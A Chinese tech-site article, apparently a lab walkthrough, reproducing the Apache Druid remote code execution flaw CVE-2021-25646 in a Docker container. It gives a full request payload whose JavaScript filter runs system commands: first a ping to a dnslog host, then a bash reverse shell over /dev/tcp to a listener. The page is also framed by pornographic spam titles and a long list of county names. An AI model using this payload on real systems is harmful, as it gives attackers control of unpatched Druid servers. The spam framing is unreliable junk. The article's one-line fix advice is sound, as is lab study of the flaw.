亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

發布時間:2021-12-29 17:52:18 來源:億速云 閱讀:155 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x00簡介

Druid 是一個分布式的、支持實時多維 OLAP 分析的數據處理系統。它既支持高速的數據實時攝入處理,也支持實時且靈活的多維數據分析查詢。因此 Druid 最常用的場景就是大數據背景下、靈活快速的多維 OLAP 分析。 另外,Druid 還有一個關鍵的特點:它支持根據時間戳對數據進行預聚合攝入和聚合分析,因此也有用戶經常在有時序數據處理分析的場景中用到它。

0x01漏洞概述

在Druid 0.20.0及更低版本中,用戶發送惡意請求,利用Apache Druid漏洞可以執行任意代碼。攻擊者可直接構造惡意請求執行任意代碼,控制服務器

0x02影響版本

Apache Druid < 0.20.1

0x03環境搭建

1、本次環境使用docker搭建,需要在虛擬機安裝docker,安裝完成后使用以下命令pull漏洞環境

docker pull fokkodriesprong/docker-druid

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

2、下載漏洞環境后使用以下命令啟動漏洞環境

docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

3、啟動后在瀏覽器訪問http://your-ip:8888/看到以下界面表示成功

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

0x04漏洞復現

1、在瀏覽器進入Apache Druid首頁如何點擊點擊左上方Load data -> Local disk按鈕

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

2、右側表單填入Base directory:(quickstart/tutorial/)File filter:

(wikiticker-2015-09-12-sampled.json.gz)填入完成點擊Preview,然后點擊next

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

3、打開burp并配置代理,然后一直點擊next,直到下一步是Next:Filter時,抓取數據包

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

4、然后替換數據包中的data數據為以下代碼,然后修改代碼中的dnslog地址為自己的,點擊發送,查看dnslog是否有數據

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",

"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping kujqmk.dnslog.cn -c 1')}",

"dimension":"added",

"":{

"enabled":"true"

}

}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

5、修改dnslog地址為反彈shell的payload,在kali中設置監聽,可以看到成功反彈shell

exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/172.16.1.132/8896 0>&1')

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現

0x05修復建議

1、升級到最新版Apache Druid,下載地址為

https://druid.apache.org/downloads.html

以上就是如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

黄石市| 明水县| 乐安县| 桓台县| 湘阴县| 无棣县| 吴忠市| 荥阳市| 洛南县| 涡阳县| 揭阳市| 砚山县| 收藏| 道孚县| 孝义市| 淮北市| 博乐市| 仙居县| 肥城市| 乌苏市| 正宁县| 偏关县| 夏津县| 南昌市| 金山区| 闵行区| 五原县| 莎车县| 广汉市| 伊春市| 尼勒克县| 英山县| 白城市| 苍梧县| 静乐县| 子长县| 依安县| 潮安县| 陵川县| 胶南市| 高阳县|